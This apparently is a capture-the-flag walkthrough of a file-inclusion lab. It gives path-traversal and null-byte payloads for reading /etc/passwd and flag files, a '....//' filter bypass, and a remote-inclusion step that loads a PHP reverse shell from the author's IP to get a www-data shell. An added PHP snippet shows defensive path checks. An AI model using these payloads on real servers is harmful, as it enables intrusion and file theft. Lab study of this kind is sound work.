File Inclusion

February 25, 2024

Task 1: Introduction

Task 2: Deploy the VM

Task 3: Path Traversal

Task 4: Local File Inclusion - LFI

  • First Task

First, test the input bar to see the intended result. As you can see, we have a PHP file named welcome.php. Let's view the file.

Now we can perform local file inclusion (LFI), reading /etc/passwd on the Linux server through PHP's include function.

Or you can use the dot-dot-slash (path traversal) technique.

  • Second Task

First we trigger an error message by requesting a file that does not exist, "welcomeee.php"; the error reveals the directory specified in the include function.

include(includes/welcomeee.php)

include is the function and includes is the directory that contains the PHP files.

Task 5: Local File Inclusion - LFI #2

  • First Task

Now for Lab #3, there is a filter in the include function that appends a .php extension to the file we request. As you can see, when we try to access /etc/passwd, a .php extension is added at the end.

To bypass this filter we append a null byte character, %00 (0x00 in hex), so that the appended extension is ignored.

NOTE: the %00 trick was fixed in PHP 5.3.4 and does not work on that version or above.

  • Second Task

For Lab #4, when we try to access the /etc/passwd file through the URL, the page says that we are not allowed to view the source file.

The PHP function used in Lab #4 is file_get_contents.

Basically, this means the include function will read the file relative to the current directory.

For example, a trailing double dot slash, as in (../../../../etc/passwd/..), moves one directory up, closer to the root directory.

But (../../../../etc/passwd/.), with just one dot, stays in the current directory and reads the specified file, which is passwd in the /etc directory.

Accessing passwd through (../../../../etc/passwd/.) actually worked because, as said above, the trailing single dot stays in the current directory, /etc, and the include function in PHP reads the passwd file.

  • Third Task

For Lab #5, we can see the admin added a filter to the include function: when we try to access /etc/passwd, it returns an error.

Payload -> ../../../../etc/passwd

Then we change our payload by inserting an additional set of dot-dot-slash ../ characters into each segment.

Why does this work? The PHP filter only matches and replaces the first substring ../ it finds in each position and does not make a second pass, so each ....// collapses back into ../, leaving the payload below.

Payload -> ....//....//....//....//etc/passwd
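To show why the single-pass filter from Lab #5 fails and what a safer check looks like, here is an added PHP example that is not part of the original writeup or the lab's code; the function names and the includes base directory are assumptions.

```php
<?php
// Added example (not from the writeup): the single-pass filter next to a
// hardened path resolver. Function names and $base are hypothetical.

// Weak: str_replace removes each "../" once, left to right, so the
// payload "....//" collapses back into "../" after the replacement.
function weak_filter(string $file): string {
    return str_replace('../', '', $file);
}

// Better: strip repeatedly until the string stops changing. This defeats
// "....//" but is still a denylist, so it should not be the only control.
function iterative_strip(string $file): string {
    do {
        $before = $file;
        $file = str_replace('../', '', $file);
    } while ($file !== $before);
    return $file;
}

// Recommended: resolve the request against an allow-listed directory and
// reject anything that lands outside it. NUL bytes and URL schemes are
// rejected up front, which also covers the %00 and RFI cases from the room.
function safe_include_path(string $base, string $file): ?string {
    if (strpos($file, "\0") !== false || preg_match('#^[a-z][a-z0-9+.-]*://#i', $file)) {
        return null;
    }
    $baseReal = realpath($base);
    $target = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($baseReal === false || $target === false) {
        return null;                       // base or target does not exist
    }
    if (strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // resolved path escaped $base
    }
    return $target;
}

// Demonstration with the Lab #5 payload:
var_dump(weak_filter('....//....//etc/passwd'));       // "../../etc/passwd": bypassed
var_dump(iterative_strip('....//....//etc/passwd'));   // "etc/passwd"
// Traversal and remote URLs both resolve to NULL under the allow-list check.
var_dump(safe_include_path(__DIR__ . '/includes', '../../../../etc/passwd'));
var_dump(safe_include_path(__DIR__ . '/includes', 'http://example.invalid/x.txt'));
```

Pairing the allow-list resolver with allow_url_include=Off in php.ini removes the remote inclusion vector entirely rather than relying on input filtering.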

  • Fourth Task

First we try the test file provided by the website. The example shown in the input bar is THM-profile/tryhackme.txt, where THM-profile is the directory and tryhackme.txt is the file being accessed in that directory.

The URL looks like this:

/lab6.php?file=THM-profile%2Ftryhackme.txt

Then we modify our payload: the directory must come first, since only files located in the THM-profile directory are allowed.

If we put THM-profile at the start of our payload, as shown below, and follow it with the dot-dot-slash sequence, we can view the os-release file in the /etc directory.

/lab6.php?file=THM-profile/../../../../etc/os-release

Here's the final answer for this task

Task 6: Remote File Inclusion - RFI

First we create a txt file containing a PHP echo tag and start our own Python web server so that the file is reachable from anywhere.

Then we just have to enter our IP address and the name of the file we created:

/playground.php?file=http://10.9.193.229:8000/try.txt

Or,

we could gain a reverse shell on the web server by including a reverse shell PHP file.

Just point the include at the reverse shell file served from our own Python server and you will get a shell as www-data:

/playground.php?file=http://10.9.193.229:8000/php-reverse-shell.php

Task 7: Remediation

Task 8: Challenge

  • First Task

Just open the browser's inspect element tool and change the form method from GET to POST.

After that, you just have to enter the payload:

../../../../etc/flag1

  • Second Task

../../../../etc/flag2%00

  • Third Task

First you have to change the method from GET to POST

Then append a null byte to the end of the payload so that the automatically added .php extension is dropped:

../../../../etc/flag3%00

  • Fourth Task

We already know how to get RCE from Task 6.
